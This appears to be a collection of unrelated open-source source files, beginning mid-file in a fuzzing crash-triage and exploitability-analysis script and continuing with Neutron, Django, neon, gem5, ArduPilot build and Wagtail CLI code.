chosen_config.default_minimized_crashes_directory) else: for signal, signal_folder in sf_all_crashes.get_folder_paths_for_signals_if_exist(uninteresting_signals): Logger.debug("Minimizing inputs resulting in signal %i" % signal) im = InputMinimizer(chosen_config, signal_folder) im.minimize_testcases() Logger.info("Interesting signals / Minimized inputs / Deduplication") fdf_minimized = FileDuplicateFinder(chosen_config, chosen_config.default_minimized_crashes_directory) fdf_minimized.delete_duplicates_recursively() # Logger.info("Interesting signals / Minimized inputs / Finding interesting signals") # sf_minimized_crashes = SignalFinder(chosen_config, chosen_config.default_minimized_crashes_directory, os.path.join(chosen_config.output_dir, "minimized-per-signal")) if os.path.exists(sf_minimized_crashes.output_dir): Logger.warning("Seems like minimized crashes were already categorized by signal, skipping. If you want to rerun: rm -r", sf_minimized_crashes.output_dir) else: os.mkdir(sf_minimized_crashes.output_dir) Logger.info("Dividing files to output folder according to their signal") sf_minimized_crashes.divide_by_signal(0) analyze_output_and_exploitability(chosen_config, sf_minimized_crashes, uninteresting_signals, message_prefix="Interesting signals / Minimized inputs /") #TODO: #- Make (some) modules work as standalone applications with command line parsing #- The FeelingLuckyExplotier thing. Need to get a small test sample where I know it should work. # # If you are in the mood to waste a little CPU time, run this # Logger.info("Found interesting_signals (interesting interesting_signals) / Minimized inputs (interested interesting_signals) / Feeling lucky auto exploitation") # # # fle = FeelingLuckyExploiter(chosen_config, sf_minimized_crashes.output_dir) # #os.mkdir(fle.output_dir) # fle.run_forest_run() cleanup(chosen_config) def cleanup(config): for path, _, files in os.walk(config.tmp_dir): for filename in files: os.remove(os.path.join(path, filename)) if __name__ == "__main__": main()
yamt/neutron
refs/heads/master
quantum/tests/unit/metaplugin/fake_plugin.py
7
# vim: tabstop=4 shiftwidth=4 softtabstop=4 # # Copyright 2012, Nachi Ueno, NTT MCL, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. from quantum.db import db_base_plugin_v2 from quantum.db import l3_db class Fake1(db_base_plugin_v2.QuantumDbPluginV2, l3_db.L3_NAT_db_mixin): supported_extension_aliases = ['router'] def fake_func(self): return 'fake1' def create_network(self, context, network): session = context.session with session.begin(subtransactions=True): net = super(Fake1, self).create_network(context, network) self._process_l3_create(context, network['network'], net['id']) self._extend_network_dict_l3(context, net) return net def update_network(self, context, id, network): session = context.session with session.begin(subtransactions=True): net = super(Fake1, self).update_network(context, id, network) self._process_l3_update(context, network['network'], id) self._extend_network_dict_l3(context, net) return net def delete_network(self, context, id): return super(Fake1, self).delete_network(context, id) def create_port(self, context, port): port = super(Fake1, self).create_port(context, port) return port def create_subnet(self, context, subnet): subnet = super(Fake1, self).create_subnet(context, subnet) return subnet def update_port(self, context, id, port): port = super(Fake1, self).update_port(context, id, port) return port def delete_port(self, context, id, l3_port_check=True): return super(Fake1, self).delete_port(context, id) class Fake2(Fake1): def fake_func(self): return 'fake2' def fake_func2(self): return 'fake2'
pigeonflight/strider-plone
refs/heads/master
docker/appengine/lib/django-1.5/django/middleware/locale.py
102
"This is the locale selecting middleware that will look at accept headers" from django.conf import settings from django.core.urlresolvers import (is_valid_path, get_resolver, LocaleRegexURLResolver) from django.http import HttpResponseRedirect from django.utils.cache import patch_vary_headers from django.utils import translation class LocaleMiddleware(object): """ This is a very simple middleware that parses a request and decides what translation object to install in the current thread context. This allows pages to be dynamically translated to the language the user desires (if the language is available, of course). """ def process_request(self, request): check_path = self.is_language_prefix_patterns_used() language = translation.get_language_from_request( request, check_path=check_path) translation.activate(language) request.LANGUAGE_CODE = translation.get_language() def process_response(self, request, response): language = translation.get_language() if (response.status_code == 404 and not translation.get_language_from_path(request.path_info) and self.is_language_prefix_patterns_used()): urlconf = getattr(request, 'urlconf', None) language_path = '/%s%s' % (language, request.path_info) path_valid = is_valid_path(language_path, urlconf) if (not path_valid and settings.APPEND_SLASH and not language_path.endswith('/')): path_valid = is_valid_path("%s/" % language_path, urlconf) if path_valid: language_url = "%s://%s/%s%s" % ( request.is_secure() and 'https' or 'http', request.get_host(), language, request.get_full_path()) return HttpResponseRedirect(language_url) translation.deactivate() patch_vary_headers(response, ('Accept-Language',)) if 'Content-Language' not in response: response['Content-Language'] = language return response def is_language_prefix_patterns_used(self): """ Returns `True` if the `LocaleRegexURLResolver` is used at root level of the urlpatterns, else it returns `False`. """ for url_pattern in get_resolver(None).url_patterns: if isinstance(url_pattern, LocaleRegexURLResolver): return True return False
dongjoon-hyun/neon
refs/heads/master
setup.py
2
#!/usr/bin/env python # ---------------------------------------------------------------------------- # Copyright 2015 Nervana Systems Inc. # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ---------------------------------------------------------------------------- import os from setuptools import setup, find_packages, Command import subprocess # Define version information VERSION = '1.3.0' FULLVERSION = VERSION write_version = True try: pipe = subprocess.Popen(["git", "rev-parse", "--short", "HEAD"], stdout=subprocess.PIPE) (so, serr) = pipe.communicate() if pipe.returncode == 0: FULLVERSION += "+%s" % so.strip().decode("utf-8") except: pass if write_version: txt = "# " + ("-" * 77) + "\n" txt += "# Copyright 2015 Nervana Systems Inc.\n" txt += "# Licensed under the Apache License, Version 2.0 " txt += "(the \"License\");\n" txt += "# you may not use this file except in compliance with the " txt += "License.\n" txt += "# You may obtain a copy of the License at\n" txt += "#\n" txt += "# http://www.apache.org/licenses/LICENSE-2.0\n" txt += "#\n" txt += "# Unless required by applicable law or agreed to in writing, " txt += "software\n" txt += "# distributed under the License is distributed on an \"AS IS\" " txt += "BASIS,\n" txt += "# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or " txt += "implied.\n" txt += "# See the License for the specific language governing permissions " txt += "and\n" txt += "# limitations under the License.\n" txt += "# " + ("-" * 77) + "\n" txt += "\"\"\"\n%s\n\"\"\"\nVERSION = '%s'\nSHORT_VERSION = '%s'\n" fname = os.path.join(os.path.dirname(__file__), 'neon', 'version.py') a = open(fname, 'w') try: a.write(txt % ("Project version information.", FULLVERSION, VERSION)) finally: a.close() setup(name='neon', version=VERSION, description="Nervana's deep learning framework", long_description=open('README.md').read(), author='Nervana Systems', author_email='info@nervanasys.com', url='http://www.nervanasys.com', license='License :: OSI Approved :: Apache Software License', scripts=['bin/neon', 'bin/nvis'], packages=find_packages(exclude=["tests"]), package_data={'neon': ['backends/kernels/sass/*.sass', 'backends/kernels/cubin/*.cubin', 'data/loader/*.so']}, classifiers=['Development Status :: 3 - Alpha', 'Environment :: Console', 'Environment :: Console :: Curses', 'Environment :: Web Environment', 'Intended Audience :: End Users/Desktop', 'Intended Audience :: Developers', 'Intended Audience :: Science/Research', 'License :: OSI Approved :: Apache Software License', 'Operating System :: POSIX', 'Operating System :: MacOS :: MacOS X', 'Programming Language :: Python', 'Topic :: Scientific/Engineering :: ' + 'Artificial Intelligence', 'Topic :: Scientific/Engineering :: Information Analysis', 'Topic :: System :: Distributed Computing'])
PetrDlouhy/django
refs/heads/master
tests/migrations2/models.py
560
# Required for migration detection (#22645)
SanchayanMaity/gem5
refs/heads/CS570
src/arch/x86/isa/insts/x87/arithmetic/addition.py
50
# Copyright (c) 2007 The Hewlett-Packard Development Company # All rights reserved. # # The license below extends only to copyright in the software and shall # not be construed as granting a license to any other intellectual # property including but not limited to intellectual property relating # to a hardware implementation of the functionality of the software # licensed hereunder. You may use the software subject to the license # terms below provided that you ensure that this notice is replicated # unmodified and in its entirety in all distributions of the software, # modified or unmodified, in source code or in binary form. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are # met: redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer; # redistributions in binary form must reproduce the above copyright # notice, this list of conditions and the following disclaimer in the # documentation and/or other materials provided with the distribution; # neither the name of the copyright holders nor the names of its # contributors may be used to endorse or promote products derived from # this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR # A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT # OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT # LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, # DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY # THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. # # Authors: Gabe Black microcode = ''' def macroop FADD1_R { addfp st(0), sti, st(0) }; def macroop FADD1_M { ldfp ufp1, seg, sib, disp addfp st(0), st(0), ufp1 }; def macroop FADD1_P { rdip t7 ldfp ufp1, seg, riprel, disp addfp st(0), st(0), ufp1 }; def macroop FADD2_R { addfp sti, sti, st(0) }; def macroop FADD2_M { ldfp ufp1, seg, sib, disp addfp st(0), st(0), ufp1 }; def macroop FADD2_P { rdip t7 ldfp ufp1, seg, riprel, disp addfp st(0), st(0), ufp1 }; def macroop FADDP { addfp st(1), st(0), st(1), spm=1 }; def macroop FADDP_R { addfp sti, sti, st(0), spm=1 }; def macroop FADDP_M { fault "std::make_shared<UnimpInstFault>()" }; def macroop FADDP_P { fault "std::make_shared<UnimpInstFault>()" }; # FIADD '''
phoneguy/ardupilot
refs/heads/master
Tools/ardupilotwaf/boards.py
5
#!/usr/bin/env python # encoding: utf-8 from collections import OrderedDict import sys import waflib from waflib.Configure import conf _board_classes = {} class BoardMeta(type): def __init__(cls, name, bases, dct): super(BoardMeta, cls).__init__(name, bases, dct) if 'abstract' not in cls.__dict__: cls.abstract = False if cls.abstract: return if not hasattr(cls, 'toolchain'): cls.toolchain = 'native' board_name = getattr(cls, 'name', name) if board_name in _board_classes: raise Exception('board named %s already exists' % board_name) _board_classes[board_name] = cls class Board: abstract = True def __init__(self): self.with_uavcan = False def configure(self, cfg): cfg.env.TOOLCHAIN = self.toolchain cfg.load('toolchain') cfg.load('cxx_checks') env = waflib.ConfigSet.ConfigSet() self.configure_env(cfg, env) d = env.get_merged_dict() # Always prepend so that arguments passed in the command line get # the priority. for k, val in d.items(): # Dictionaries (like 'DEFINES') are converted to lists to # conform to waf conventions. if isinstance(val, dict): keys = list(val.keys()) if not isinstance(val, OrderedDict): keys.sort() val = ['%s=%s' % (vk, val[vk]) for vk in keys] if k in cfg.env and isinstance(cfg.env[k], list): cfg.env.prepend_value(k, val) else: cfg.env[k] = val cfg.ap_common_checks() cfg.env.prepend_value('INCLUDES', [ cfg.srcnode.find_dir('libraries/AP_Common/missing').abspath() ]) def configure_env(self, cfg, env): # Use a dictionary instead of the convetional list for definitions to # make easy to override them. Convert back to list before consumption. env.DEFINES = {} env.CFLAGS += [ '-ffunction-sections', '-fdata-sections', '-fsigned-char', '-Wall', '-Wextra', '-Wformat', '-Wshadow', '-Wpointer-arith', '-Wcast-align', '-Wundef', '-Wno-missing-field-initializers', '-Wno-unused-parameter', '-Wno-redundant-decls', '-Wno-unknown-pragmas', ] if 'clang' in cfg.env.COMPILER_CC: env.CFLAGS += [ '-fcolor-diagnostics', '-Wno-gnu-designator', '-Wno-inconsistent-missing-override', '-Wno-mismatched-tags', '-Wno-gnu-variable-sized-type-not-at-end', '-Wno-c++11-narrowing' ] if cfg.env.DEBUG: env.CFLAGS += [ '-g', '-O0', ] env.CXXFLAGS += [ '-std=gnu++11', '-fdata-sections', '-ffunction-sections', '-fno-exceptions', '-fsigned-char', '-Wall', '-Wextra', '-Wformat', '-Wshadow', '-Wpointer-arith', '-Wcast-align', '-Wundef', '-Wno-unused-parameter', '-Wno-missing-field-initializers', '-Wno-reorder', '-Wno-redundant-decls', '-Wno-unknown-pragmas', '-Werror=format-security', '-Werror=array-bounds', '-Werror=uninitialized', '-Werror=init-self', '-Werror=switch', '-Wfatal-errors', ] if 'clang++' in cfg.env.COMPILER_CXX: env.CXXFLAGS += [ '-fcolor-diagnostics', '-Wno-gnu-designator', '-Wno-inconsistent-missing-override', '-Wno-mismatched-tags', '-Wno-gnu-variable-sized-type-not-at-end', '-Wno-c++11-narrowing' ] else: env.CXXFLAGS += [ '-Werror=unused-but-set-variable' ] if cfg.env.DEBUG: env.CXXFLAGS += [ '-g', '-O0', ] if cfg.env.DEST_OS == 'darwin': env.LINKFLAGS += [ '-Wl,-dead_strip', ] else: env.LINKFLAGS += [ '-Wl,--gc-sections', ] if self.with_uavcan: env.AP_LIBRARIES += [ 'AP_UAVCAN', 'modules/uavcan/libuavcan/src/**/*.cpp' ] env.CXXFLAGS += [ '-Wno-error=cast-align', ] env.DEFINES.update( UAVCAN_CPP_VERSION = 'UAVCAN_CPP03', UAVCAN_NO_ASSERTIONS = 1, UAVCAN_NULLPTR = 'nullptr' ) env.INCLUDES += [ cfg.srcnode.find_dir('modules/uavcan/libuavcan/include').abspath() ] # We always want to use PRI format macros cfg.define('__STDC_FORMAT_MACROS', 1) def build(self, bld): bld.ap_version_append_str('GIT_VERSION', bld.git_head_hash(short=True)) Board = BoardMeta('Board', Board.__bases__, dict(Board.__dict__)) def get_boards_names(): return sorted(list(_board_classes.keys())) _board = None @conf def get_board(ctx): global _board if not _board: if not ctx.env.BOARD: ctx.fatal('BOARD environment variable must be set before first call to get_board()') _board = _board_classes[ctx.env.BOARD]() return _board # NOTE: Keeping all the board definitions together so we can easily # identify opportunities to simplify common flags. In the future might # be worthy to keep board definitions in files of their own. class sitl(Board): def configure_env(self, cfg, env): super(sitl, self).configure_env(cfg, env) env.DEFINES.update( CONFIG_HAL_BOARD = 'HAL_BOARD_SITL', CONFIG_HAL_BOARD_SUBTYPE = 'HAL_BOARD_SUBTYPE_NONE', ) if not cfg.env.DEBUG: env.CXXFLAGS += [ '-O3', ] env.LIB += [ 'm', ] cfg.check_librt(env) env.LINKFLAGS += ['-pthread',] env.AP_LIBRARIES += [ 'AP_HAL_SITL', 'SITL', ] if sys.platform == 'cygwin': env.LIB += [ 'winmm', ] class linux(Board): def configure_env(self, cfg, env): super(linux, self).configure_env(cfg, env) cfg.find_toolchain_program('pkg-config', var='PKGCONFIG') env.DEFINES.update( CONFIG_HAL_BOARD = 'HAL_BOARD_LINUX', CONFIG_HAL_BOARD_SUBTYPE = 'HAL_BOARD_SUBTYPE_LINUX_NONE', ) if not cfg.env.DEBUG: env.CXXFLAGS += [ '-O3', ] env.LIB += [ 'm', ] cfg.check_librt(env) cfg.check_lttng(env) cfg.check_libdl(env) cfg.check_libiio(env) env.LINKFLAGS += ['-pthread',] env.AP_LIBRARIES = [ 'AP_HAL_Linux', ] class minlure(linux): def configure_env(self, cfg, env): super(minlure, self).configure_env(cfg, env) env.DEFINES.update( CONFIG_HAL_BOARD_SUBTYPE = 'HAL_BOARD_SUBTYPE_LINUX_MINLURE', ) class erleboard(linux): toolchain = 'arm-linux-gnueabihf' def configure_env(self, cfg, env): super(erleboard, self).configure_env(cfg, env) env.DEFINES.update( CONFIG_HAL_BOARD_SUBTYPE = 'HAL_BOARD_SUBTYPE_LINUX_ERLEBOARD', ) class navio(linux): toolchain = 'arm-linux-gnueabihf' def configure_env(self, cfg, env): super(navio, self).configure_env(cfg, env) env.DEFINES.update( CONFIG_HAL_BOARD_SUBTYPE = 'HAL_BOARD_SUBTYPE_LINUX_NAVIO', ) class navio2(linux): toolchain = 'arm-linux-gnueabihf' def configure_env(self, cfg, env): super(navio2, self).configure_env(cfg, env) env.DEFINES.update( CONFIG_HAL_BOARD_SUBTYPE = 'HAL_BOARD_SUBTYPE_LINUX_NAVIO2', ) class zynq(linux): toolchain = 'arm-xilinx-linux-gnueabi' def configure_env(self, cfg, env): super(zynq, self).configure_env(cfg, env) env.DEFINES.update( CONFIG_HAL_BOARD_SUBTYPE = 'HAL_BOARD_SUBTYPE_LINUX_ZYNQ', ) class bbbmini(linux): toolchain = 'arm-linux-gnueabihf' def configure_env(self, cfg, env): super(bbbmini, self).configure_env(cfg, env) env.DEFINES.update( CONFIG_HAL_BOARD_SUBTYPE = 'HAL_BOARD_SUBTYPE_LINUX_BBBMINI', ) class blue(linux): toolchain = 'arm-linux-gnueabihf' def configure_env(self, cfg, env): super(blue, self).configure_env(cfg, env) env.DEFINES.update( CONFIG_HAL_BOARD_SUBTYPE = 'HAL_BOARD_SUBTYPE_LINUX_BLUE', ) class pxf(linux): toolchain = 'arm-linux-gnueabihf' def configure_env(self, cfg, env): super(pxf, self).configure_env(cfg, env) env.DEFINES.update( CONFIG_HAL_BOARD_SUBTYPE = 'HAL_BOARD_SUBTYPE_LINUX_PXF', ) class bebop(linux): toolchain = 'arm-linux-gnueabihf' def configure_env(self, cfg, env): super(bebop, self).configure_env(cfg, env) env.DEFINES.update( CONFIG_HAL_BOARD_SUBTYPE = 'HAL_BOARD_SUBTYPE_LINUX_BEBOP', ) class disco(linux): toolchain = 'arm-linux-gnueabihf' def configure_env(self, cfg, env): super(disco, self).configure_env(cfg, env) env.DEFINES.update( CONFIG_HAL_BOARD_SUBTYPE = 'HAL_BOARD_SUBTYPE_LINUX_DISCO', ) class raspilot(linux): toolchain = 'arm-linux-gnueabihf' def configure_env(self, cfg, env): super(raspilot, self).configure_env(cfg, env) env.DEFINES.update( CONFIG_HAL_BOARD_SUBTYPE = 'HAL_BOARD_SUBTYPE_LINUX_RASPILOT', ) class erlebrain2(linux): toolchain = 'arm-linux-gnueabihf' def configure_env(self, cfg, env): super(erlebrain2, self).configure_env(cfg, env) env.DEFINES.update( CONFIG_HAL_BOARD_SUBTYPE = 'HAL_BOARD_SUBTYPE_LINUX_ERLEBRAIN2', ) class bhat(linux): toolchain = 'arm-linux-gnueabihf' def configure_env(self, cfg, env): super(bhat, self).configure_env(cfg, env) env.DEFINES.update( CONFIG_HAL_BOARD_SUBTYPE = 'HAL_BOARD_SUBTYPE_LINUX_BH', ) class dark(linux): toolchain = 'arm-linux-gnueabihf' def configure_env(self, cfg, env): super(dark, self).configure_env(cfg, env) env.DEFINES.update( CONFIG_HAL_BOARD_SUBTYPE = 'HAL_BOARD_SUBTYPE_LINUX_DARK', ) class urus(linux): toolchain = 'arm-linux-gnueabihf' def configure_env(self, cfg, env): super(urus, self).configure_env(cfg, env) env.DEFINES.update( CONFIG_HAL_BOARD_SUBTYPE = 'HAL_BOARD_SUBTYPE_LINUX_URUS', ) class pxfmini(linux): toolchain = 'arm-linux-gnueabihf' def configure_env(self, cfg, env): super(pxfmini, self).configure_env(cfg, env) env.DEFINES.update( CONFIG_HAL_BOARD_SUBTYPE = 'HAL_BOARD_SUBTYPE_LINUX_PXFMINI', ) class aero(linux): def configure_env(self, cfg, env): super(aero, self).configure_env(cfg, env) env.DEFINES.update( CONFIG_HAL_BOARD_SUBTYPE = 'HAL_BOARD_SUBTYPE_LINUX_AERO', ) class px4(Board): abstract = True toolchain = 'arm-none-eabi' def __init__(self): # bootloader name: a file with that name will be used and installed # on ROMFS super(px4, self).__init__() self.bootloader_name = None # board name: it's the name of this board that's also used as path # in ROMFS: don't add spaces self.board_name = None # px4io binary name: this is the name of the IO binary to be installed # in ROMFS self.px4io_name = None # board-specific init script: if True a file with `board_name` name will # be searched for in sources and installed in ROMFS as rc.board. This # init script is used to change the init behavior among different boards. self.board_rc = False self.ROMFS_EXCLUDE = [] def configure(self, cfg): if not self.bootloader_name: cfg.fatal('configure: px4: bootloader name is required') if not self.board_name: cfg.fatal('configure: px4: board name is required') super(px4, self).configure(cfg) cfg.load('px4') def configure_env(self, cfg, env): super(px4, self).configure_env(cfg, env) env.DEFINES.update( CONFIG_HAL_BOARD = 'HAL_BOARD_PX4', HAVE_OCLOEXEC = 0, HAVE_STD_NULLPTR_T = 0, ) env.CXXFLAGS += [ '-Wlogical-op', '-Wframe-larger-than=1300', '-fsingle-precision-constant', '-Wno-error=double-promotion', '-Wno-error=missing-declarations', '-Wno-error=float-equal', '-Wno-error=undef', '-Wno-error=cpp', ] env.AP_LIBRARIES += [ 'AP_HAL_PX4', ] env.GIT_SUBMODULES += [ 'PX4Firmware', 'PX4NuttX', 'uavcan', ] env.ROMFS_EXCLUDE = self.ROMFS_EXCLUDE env.PX4_BOOTLOADER_NAME = self.bootloader_name env.PX4_BOARD_NAME = self.board_name env.PX4_BOARD_RC = self.board_rc env.PX4_PX4IO_NAME = self.px4io_name env.AP_PROGRAM_AS_STLIB = True def build(self, bld): super(px4, self).build(bld) bld.ap_version_append_str('NUTTX_GIT_VERSION', bld.git_submodule_head_hash('PX4NuttX', short=True)) bld.ap_version_append_str('PX4_GIT_VERSION', bld.git_submodule_head_hash('PX4Firmware', short=True)) bld.load('px4') def romfs_exclude(self, exclude): self.ROMFS_EXCLUDE += exclude class px4_v1(px4): name = 'px4-v1' def __init__(self): super(px4_v1, self).__init__() self.bootloader_name = 'px4fmu_bl.bin' self.board_name = 'px4fmu-v1' self.px4io_name = 'px4io-v1' self.romfs_exclude(['oreoled.bin']) class px4_v2(px4): name = 'px4-v2' def __init__(self): super(px4_v2, self).__init__() self.bootloader_name = 'px4fmuv2_bl.bin' self.board_name = 'px4fmu-v2' self.px4io_name = 'px4io-v2' self.romfs_exclude(['oreoled.bin']) self.with_uavcan = True class px4_v3(px4): name = 'px4-v3' def __init__(self): super(px4_v3, self).__init__() self.bootloader_name = 'px4fmuv2_bl.bin' self.board_name = 'px4fmu-v3' self.px4io_name = 'px4io-v2' self.with_uavcan = True class px4_v4(px4): name = 'px4-v4' def __init__(self): super(px4_v4, self).__init__() self.bootloader_name = 'px4fmuv4_bl.bin' self.board_name = 'px4fmu-v4' self.romfs_exclude(['oreoled.bin']) self.with_uavcan = True class aerofc_v1(px4): name = 'aerofc-v1' def __init__(self): super(aerofc_v1, self).__init__() self.bootloader_name = 'aerofcv1_bl.bin' self.board_name = 'aerofc-v1' self.romfs_exclude(['oreoled.bin']) self.board_rc = True
zerolab/wagtail
refs/heads/main
wagtail/bin/wagtail.py
6
#!/usr/bin/env python import fileinput import fnmatch import os import re import sys from argparse import ArgumentParser from difflib import unified_diff from django.core.management import ManagementUtility CURRENT_PYTHON = sys.version_info[:2] REQUIRED_PYTHON = (3, 5) if CURRENT_PYTHON < REQUIRED_PYTHON: sys.stderr.write("This version of Wagtail requires Python {}.{} or above - you are running {}.{}\n".format(*(REQUIRED_PYTHON + CURRENT_PYTHON))) sys.exit(1) def pluralize(value, arg='s'): return '' if value == 1 else arg class Command: description = None def create_parser(self, command_name=None): if command_name is None: prog = None else: # hack the prog name as reported to ArgumentParser to include the command prog = "%s %s" % (prog_name(), command_name) parser = ArgumentParser( description=getattr(self, 'description', None), add_help=False, prog=prog ) self.add_arguments(parser) return parser def add_arguments(self, parser): pass def print_help(self, command_name): parser = self.create_parser(command_name=command_name) parser.print_help() def execute(self, argv): parser = self.create_parser() options = parser.parse_args(sys.argv[2:]) options_dict = vars(options) self.run(**options_dict) class CreateProject(Command): description = "Creates the directory structure for a new Wagtail project." def add_arguments(self, parser): parser.add_argument('project_name', help="Name for your Wagtail project") parser.add_argument('dest_dir', nargs='?', help="Destination directory inside which to create the project") def run(self, project_name=None, dest_dir=None): # Make sure given name is not already in use by another python package/module. try: __import__(project_name) except ImportError: pass else: sys.exit("'%s' conflicts with the name of an existing " "Python module and cannot be used as a project " "name. Please try another name." % project_name) print("Creating a Wagtail project called %(project_name)s" % {'project_name': project_name}) # noqa # Create the project from the Wagtail template using startapp # First find the path to Wagtail import wagtail wagtail_path = os.path.dirname(wagtail.__file__) template_path = os.path.join(wagtail_path, 'project_template') # Call django-admin startproject utility_args = ['django-admin', 'startproject', '--template=' + template_path, '--ext=html,rst', '--name=Dockerfile', project_name] if dest_dir: utility_args.append(dest_dir) utility = ManagementUtility(utility_args) utility.execute() print("Success! %(project_name)s has been created" % {'project_name': project_name}) # noqa class UpdateModulePaths(Command): description = "Update a Wagtail project tree to use Wagtail 2.x module paths" REPLACEMENTS = [ (re.compile(r'\bwagtail\.wagtailcore\b'), 'wagtail.core'), (re.compile(r'\bwagtail\.wagtailadmin\b'), 'wagtail.admin'), (re.compile(r'\bwagtail\.wagtaildocs\b'), 'wagtail.documents'), (re.compile(r'\bwagtail\.wagtailembeds\b'), 'wagtail.embeds'), (re.compile(r'\bwagtail\.wagtailimages\b'), 'wagtail.images'), (re.compile(r'\bwagtail\.wagtailsearch\b'), 'wagtail.search'), (re.compile(r'\bwagtail\.wagtailsites\b'), 'wagtail.sites'), (re.compile(r'\bwagtail\.wagtailsnippets\b'), 'wagtail.snippets'), (re.compile(r'\bwagtail\.wagtailusers\b'), 'wagtail.users'), (re.compile(r'\bwagtail\.wagtailforms\b'), 'wagtail.contrib.forms'), (re.compile(r'\bwagtail\.wagtailredirects\b'), 'wagtail.contrib.redirects'), (re.compile(r'\bwagtail\.contrib\.wagtailfrontendcache\b'), 'wagtail.contrib.frontend_cache'), (re.compile(r'\bwagtail\.contrib\.wagtailroutablepage\b'), 'wagtail.contrib.routable_page'), (re.compile(r'\bwagtail\.contrib\.wagtailsearchpromotions\b'), 'wagtail.contrib.search_promotions'), (re.compile(r'\bwagtail\.contrib\.wagtailsitemaps\b'), 'wagtail.contrib.sitemaps'), (re.compile(r'\bwagtail\.contrib\.wagtailstyleguide\b'), 'wagtail.contrib.styleguide'), ] def add_arguments(self, parser): parser.add_argument('root_path', nargs='?', help="Path to your project's root") parser.add_argument('--list', action='store_true', dest='list_files', help="Show the list of files to change, without modifying them") parser.add_argument('--diff', action='store_true', help="Show the changes that would be made, without modifying the files") parser.add_argument( '--ignore-dir', action='append', dest='ignored_dirs', metavar='NAME', help="Ignore files in this directory" ) parser.add_argument( '--ignore-file', action='append', dest='ignored_patterns', metavar='NAME', help="Ignore files with this name (supports wildcards)" ) def run(self, root_path=None, list_files=False, diff=False, ignored_dirs=None, ignored_patterns=None): if root_path is None: root_path = os.getcwd() absolute_ignored_dirs = [ os.path.abspath(dir_path) + os.sep for dir_path in (ignored_dirs or []) ] if ignored_patterns is None: ignored_patterns = [] checked_file_count = 0 changed_file_count = 0 for (dirpath, dirnames, filenames) in os.walk(root_path): dirpath_with_slash = os.path.abspath(dirpath) + os.sep if any(dirpath_with_slash.startswith(ignored_dir) for ignored_dir in absolute_ignored_dirs): continue for filename in filenames: if not filename.lower().endswith('.py'): continue if any(fnmatch.fnmatch(filename, pattern) for pattern in ignored_patterns): continue path = os.path.join(dirpath, filename) relative_path = os.path.relpath(path, start=root_path) checked_file_count += 1 if diff: change_count = self._show_diff(path, relative_path=relative_path) else: if list_files: change_count = self._count_changes(path) else: # actually update change_count = self._rewrite_file(path) if change_count: print("%s - %d change%s" % (relative_path, change_count, pluralize(change_count))) # NOQA if change_count: changed_file_count += 1 if diff or list_files: print( "\nChecked %d .py file%s, %d file%s to update." % ( checked_file_count, pluralize(checked_file_count), changed_file_count, pluralize(changed_file_count) ) ) # NOQA else: print( "\nChecked %d .py file%s, %d file%s updated." % ( checked_file_count, pluralize(checked_file_count), changed_file_count, pluralize(changed_file_count) ) ) # NOQA def _rewrite_line(self, line): for pattern, repl in self.REPLACEMENTS: line = re.sub(pattern, repl, line) return line def _show_diff(self, filename, relative_path=None): change_count = 0 original = [] updated = [] with open(filename) as f: for original_line in f: original.append(original_line) line = self._rewrite_line(original_line) updated.append(line) if line != original_line: change_count += 1 if change_count: relative_path = relative_path or filename sys.stdout.writelines(unified_diff( original, updated, fromfile="%s:before" % relative_path, tofile="%s:after" % relative_path )) return change_count def _count_changes(self, filename): change_count = 0 with open(filename) as f: for original_line in f: line = self._rewrite_line(original_line) if line != original_line: change_count += 1 return change_count def _rewrite_file(self, filename): change_count = 0 with fileinput.FileInput(filename, inplace=True) as f: for original_line in f: line = self._rewrite_line(original_line) print(line, end='') # NOQA if line != original_line: change_count += 1 return change_count class Version(Command): description = "List which version of Wagtail you are using" def run(self): import wagtail version = wagtail.get_version(wagtail.VERSION) print("You are using Wagtail %(version)s" % {'version': version}) COMMANDS = { 'start': CreateProject(), 'updatemodulepaths': UpdateModulePaths(), '--version': Version() } def prog_name(): return os.path.basename(sys.argv[0]) def help_index(): print("Type '%s help <subcommand>' for help on a specific subcommand.\n" % prog_name()) # NOQA print("Available subcommands:\n") # NOQA for name, cmd in sorted(COMMANDS.items()): print(" %s%s" % (name.ljust(20), cmd.description)) # NOQA def unknown_command(command): print("Unknown command: '%s'" % command) # NOQA print("Type '%s help' for usage." % prog_name()) # NOQA sys.exit(1) def main(): try: command_name = sys.argv[1] except IndexError: help_index() return if command_name == 'help': try: help_command_name = sys.argv[2] except IndexError: help_index() return try: command = COMMANDS[help_command_name] except KeyError: unknown_command(help_command_name) return command.print_help(help_command_name) return try: command = COMMANDS[command_name] except KeyError: unknown_command(command_name) return command.execute(sys.argv) if __name__ == "__main__": main()
arante/pyloc
refs/heads/master
microblog/flask/lib/python3.5/site-packages/sqlalchemy/sql/annotation.py
23
